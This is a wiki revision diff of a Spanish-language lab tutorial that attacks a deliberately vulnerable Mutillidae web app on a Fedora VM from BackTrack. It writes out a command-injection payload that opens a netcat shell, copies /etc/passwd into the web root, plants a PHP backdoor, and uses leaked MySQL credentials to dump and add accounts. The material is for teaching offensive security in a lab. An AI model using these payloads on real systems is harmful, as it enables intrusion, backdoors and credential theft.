Seguridad y Alta Disponibilidad

Herramientas de usuario

Herramientas del sitio

Traza: p1 p4 nas t4 t2 p5 p13 p14 p5 p2
sad:fedora14:p3

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión		Revisión previa
sad:fedora14:p3 [2018/01/29 19:11] José Manuel Guallarsad:fedora14:p3 [2019/01/04 13:18] (actual) – editor externo 127.0.0.1
Línea 35: Línea 35:
   * BT tiene 192.168.153.43   * BT tiene 192.168.153.43
  
-1+{{:sad:fedora:p3:1.png?500|}}
  
 Vamos como el ejercicio anterior a http://ip-fedora/mutillidae y seleccionamos  Vamos como el ejercicio anterior a http://ip-fedora/mutillidae y seleccionamos 
Línea 47: Línea 47:
 Instrucciones: Instrucciones:
 <code basH> <code basH>
-www.colegiomontessori.com; mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444> /tmp/pipe+www.colegiomontessori.com; mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
 </code> </code>
  
Línea 55: Línea 55:
  
 Esto permitirá que dos procesos se conecten a netcat. Esto permitirá que dos procesos se conecten a netcat.
-<code bash> 
-nc -l 4444, le dice a netcat que escuche y permita conexiones en el puerto 4444. 
-</code> 
  
-+**nc -l 4444,** le dice a netcat que escuche y permita conexiones en el puerto 4444. 
-3+ 
 + 
 +{{:sad:fedora:p3:2.png?500|}} 
 +{{:sad:fedora:p3:3.png?500|}}
  
 **NOTA**: NO SE MUESTRA NINGÚN RESULTADO EN LA EJECUCIÓN DE ESTA SENTENCIA **NOTA**: NO SE MUESTRA NINGÚN RESULTADO EN LA EJECUCIÓN DE ESTA SENTENCIA
Línea 74: Línea 74:
 Escribir las siguientes sentencias en el BackTrack Escribir las siguientes sentencias en el BackTrack
  
-Reemplazar 192.168.1.111 con la dirección IP de Fedora.+Reemplazar la ip con la dirección IP de tu Fedora.
  
-**nc 192.168.153.39 4444**+<code bash> 
 +root@bt:~# nc 192.168.153.39 4444 
 +</code>
  
-4+{{:sad:fedora:p3:04.png?500|}}
  
 Utilicamos el BackTrack para conectarse a la sesión Netcat de Fedora en el puerto 4444 Utilicamos el BackTrack para conectarse a la sesión Netcat de Fedora en el puerto 4444
  
-**hostname**+''**hostname**''
  
 Este es el nombre de host del servidor que aloja DVWA. Este es el nombre de host del servidor que aloja DVWA.
  
-**whoami**+''**whoami**''
  
 Es decir, ¿con quién me conecto? Es decir, ¿con quién me conecto?
  
-**pwd**+''**pwd**''
  
 directorio de trabajo directorio de trabajo
  
-**uname -a**+''**uname -a**''
  
-muestra informacion del sistema operatico+muestra informacion del sistema operativo
  
-**cat /etc/passwd > passwd.txt**+''**cat /etc/passwd > passwd.txt**''
  
 crea passwd.txt localizado en /var/www/html/multillidae crea passwd.txt localizado en /var/www/html/multillidae
-ls -l $PWD/passwd.txt+ 
 +''**ls -l $PWD/passwd.txt**''
  
 lista el fichero passwd.txt lista el fichero passwd.txt
  
-5+{{:sad:fedora:p3:05.png?500|}}
  
 **volvemos al Firefox y abrimos otra pestaña y escribimos** **volvemos al Firefox y abrimos otra pestaña y escribimos**
  
-http://ip-fedora/mutillidae/passwd.txt+''** http://ip-fedora/mutillidae/passwd.txt**''
  
-06+{{:sad:fedora:p3:06.png?500|}}
  
 ====== Creación de una puerta trasera (PHP) ====== ====== Creación de una puerta trasera (PHP) ======
Línea 127: Línea 130:
 cat nc_connect.php cat nc_connect.php
 </code> </code>
-7 
  
-http://ip-fedora/multillidae/nc_connect.php+{{:sad:fedora:p3:07.png?500|}}
  
-Ejecutamos nc_connect.php+''**http://ip-fedora/mutillidae/nc_connect.php**''
  
-http://ip-fedora/multillidae/nc_connect.php+Ejecutamos **nc_connect.php** 
 + 
 +''**http://ip-fedora/mutillidae/nc_connect.php**''
  
 veremos que en la web pone conectando..... veremos que en la web pone conectando.....
Línea 141: Línea 145:
 <code bash> <code bash>
  
-root@bt:~# nc 192.168.1.111 3333+root@bt:~# nc 192.168.153.39 3333
 whoami whoami
 ps -eaf | egrep '(3333|4444)' ps -eaf | egrep '(3333|4444)'
  
 </code> </code>
-9 
  
-las dos primeras lineas es la ejecución del netcat via nslookup+{{:sad:fedora:p3:08.png?500|}} 
 +{{:sad:fedora:p3:09.png?500|}} 
 + 
 +Las dos primeras lineas es la ejecución del netcat via nslookup
  
 las ultimas lineas el la puerta trasera las ultimas lineas el la puerta trasera
Línea 156: Línea 162:
 primero vamos a ver nuestro directorio de trabajo primero vamos a ver nuestro directorio de trabajo
  
-**pwd**+''**pwd**''
  
-luego vamos a contar los scripts+luego vamos a contar los scripts\\
  
-**find * -name "*.php" | wc -l**+''**find * -name "*.php" | wc -l**''
  
-despues vamos a contar los archivos include de php+despues vamos a contar los archivos incluye de php\\
  
-**find * -name "*.inc" | wc -l**+''**find * -name "*.inc" | wc -l**''
  
-lo siguiente sera buscar en cada archivo include (.inc) las palabras "password" "db" o "database"+lo siguiente sera buscar en cada archivo include (.inc) las palabras "password" "db" o "database"\\ 
 + 
 +{{:sad:fedora:p3:10.png?500|}}
  
 <code bash> <code bash>
Línea 180: Línea 188:
 **egrep -i '(db|database)'** buscar las cadenas db o database **egrep -i '(db|database)'** buscar las cadenas db o database
  
-11+{{:sad:fedora:p3:11.png?500|}}
  
 <code bash> <code bash>
Línea 186: Línea 194:
 </code> </code>
  
 +{{:sad:fedora:p3:12.png?500|}}
 ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php
  
Línea 193: Línea 202:
 find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10 find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10
 </code> </code>
-13+{{:sad:fedora:p3:13.png?500|}}
  
 El siguiente comando muestra cómo ejecutar los comandos de la base de datos en la sesión de netcat. El siguiente comando muestra cómo ejecutar los comandos de la base de datos en la sesión de netcat.
Línea 201: Línea 210:
 echo "use nowasp; show tables;" | mysql -uroot -psamurai echo "use nowasp; show tables;" | mysql -uroot -psamurai
 </code> </code>
-14 
  
-vamos a investigar el contenido de la tabla accounts+{{:sad:fedora:p3:14.png?500|}} 
 + 
 +Vamos a investigar el contenido de la tabla accounts
  
 primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas
Línea 211: Línea 221:
 echo "select * from nowasp.accounts;" | mysql -uroot -psamurai echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
 </code> </code>
-15+ 
 +{{:sad:fedora:p3:15.png?500|}}
  
 ===== ahora vamos a crear un nuevo usuario en la tabla ===== ===== ahora vamos a crear un nuevo usuario en la tabla =====
Línea 220: Línea 231:
 echo "select * from nowasp.accounts;" | mysql -uroot -psamurai echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
 </code> </code>
-16 +{{:sad:fedora:p3:16.png?500|}} 
-_+ 
 ''** print de pantalla final**'' ''** print de pantalla final**''
  
-Tienes que realizar los siguientes pasos en el terminal de netcat nc_config.php+Tienes que realizar los siguientes pasos en el terminal de netcat nc_connect.php
  
 <code bash> <code bash>
sad/fedora14/p3.1517253067.txt.gz · Última modificación: (editor externo)